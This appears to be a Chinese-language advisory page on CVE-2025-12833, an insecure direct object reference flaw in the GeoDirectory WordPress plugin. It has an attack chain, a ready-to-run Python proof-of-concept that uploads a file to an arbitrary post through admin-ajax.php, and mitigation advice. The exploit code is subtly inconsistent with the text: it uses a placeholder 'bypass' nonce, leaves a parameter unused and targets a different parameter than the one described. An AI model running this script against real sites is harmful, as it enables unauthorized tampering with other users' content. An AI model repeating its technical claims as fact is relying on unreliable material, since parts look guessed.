CVE-2025-12833 GeoDirectory WordPress插件IDOR漏洞

漏洞信息

漏洞编号

CVE-2025-12833

漏洞类型

IDOR (不安全的直接对象引用)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GeoDirectory WordPress插件

漏洞概述

CVE-2025-12833是WordPress平台下GeoDirectory商业目录插件的一个中危安全漏洞。该插件是一款功能强大的企业黄页和分类广告目录插件，广泛应用于各类商业网站。漏洞存在于插件的post_attachment_upload函数中，由于该函数缺少对用户控制键的正确验证，导致存在不安全的直接对象引用问题。攻击者利用此漏洞可以绕过正常的权限检查，将任意图像文件附加到任意位置。漏洞影响范围涵盖插件2.8.139及之前的所有版本。成功利用此漏洞需要攻击者具有author级别（作者）及以上的WordPress用户权限，这意味着攻击者需要拥有一个有效的网站账户。漏洞的潜在危害包括：攻击者可以上传恶意构造的图像文件，可能用于存储型XSS攻击；可以操纵网站内容结构，破坏网站完整性；甚至可能通过文件上传功能绕过某些安全限制。虽然CVSS评分仅为4.3，属于中危级别，但由于该插件在商业网站中的广泛应用，漏洞的实际影响范围可能较大。建议所有使用该插件的用户尽快升级到最新版本，并审查用户权限配置。

技术细节

漏洞根源在于GeoDirectory插件的post_attachment_upload函数在处理文件上传请求时，未对用户提供的key参数进行充分的验证和授权检查。该函数直接使用用户控制的数据作为对象引用的标识符，而没有验证当前用户是否有权对该对象执行操作。在正常的WordPress权限模型中，作者级别的用户只能编辑和上传与自己文章相关的内容，但由于IDOR漏洞的存在，攻击者可以通过修改请求中的对象标识符（如帖子ID、附件ID等）来访问或修改其他用户的内容。具体来说，攻击者构造恶意请求时，在post_attachment_upload函数的参数中指定一个任意的key值，该值对应网站上的其他资源（如其他用户的帖子或附件），服务器端由于缺少验证，直接允许该操作执行。漏洞利用的关键在于绕过WordPress的nonce令牌保护和 capability检查，因为这些检查通常基于当前上下文，而IDOR攻击可以绕过这种基于上下文的检查。攻击者可以利用此漏洞上传任意图像文件到任意帖子或页面，破坏网站内容的完整性。修复方案需要在post_attachment_upload函数中添加对象所有权验证，确保用户只能操作自己有权访问的资源。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress网站的作者级别账户权限

STEP 2

步骤2

攻击者构造恶意文件上传请求，在post_id参数中指定目标帖子ID

STEP 3

步骤3

由于post_attachment_upload函数缺少对象所有权验证，服务器接受请求

STEP 4

步骤4

恶意图像文件被成功附加到攻击者指定的任意帖子

STEP 5

步骤5

攻击者利用上传的恶意文件实施进一步攻击，如存储型XSS

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from urllib.parse import urlencode

# CVE-2025-12833 PoC - GeoDirectory IDOR Vulnerability
# Target: WordPress site with GeoDirectory plugin <= 2.8.139
# Authentication required: Author-level user or higher

def exploit_idor(target_url, username, password, target_post_id, attacker_post_id):
    """
    Exploit IDOR vulnerability in GeoDirectory post_attachment_upload function
    Allows authenticated attackers to attach files to arbitrary posts
    """
    session = requests.Session()
    
    # Step 1: Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': target_url,
        'testcookie': '1'
    }
    
    response = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed")
        return False
    
    print("[+] Login successful")
    
    # Step 2: Prepare malicious file upload request
    # The IDOR vulnerability allows attaching files to arbitrary posts
    # by manipulating the post_id parameter
    upload_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    files = {
        'async-upload': ('malicious.jpg', b'\xFF\xD8\xFF\xE0\x00\x10JFIF', 'image/jpeg')
    }
    
    # IDOR payload: target arbitrary post_id instead of attacker's own post
    data = {
        'post_id': target_post_id,  # IDOR: Can be any post ID
        'action': 'post_attachment_upload',
        '_wpnonce': 'bypass',  # Nonce validation may be flawed
        'user_id': '1'
    }
    
    # Step 3: Send exploit request
    response = session.post(upload_url, data=data, files=files)
    
    if response.status_code == 200:
        print(f"[+] File attachment request sent to post ID: {target_post_id}")
        print("[+] Check if file was attached to target post")
        return True
    else:
        print(f"[-] Request failed with status: {response.status_code}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 6:
        print("Usage: python cve-2025-12833.py <target_url> <username> <password> <target_post_id> <attacker_post_id>")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    target_id = sys.argv[4]
    attacker_id = sys.argv[5]
    
    exploit_idor(target, user, pwd, target_id, attacker_id)

影响范围

GeoDirectory WordPress插件 <= 2.8.139

Classified Listings Directory插件所有版本

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1) 禁用或限制文件上传功能；2) 审查所有具有作者权限的用户账户；3) 实施Web应用防火墙规则拦截异常的上传请求；4) 监控wp-content/uploads目录下的异常文件活动；5) 考虑使用WordPress安全插件增强权限控制。建议在可行的情况下尽快执行版本升级，因为临时缓解措施可能影响网站功能且无法根本解决IDOR漏洞。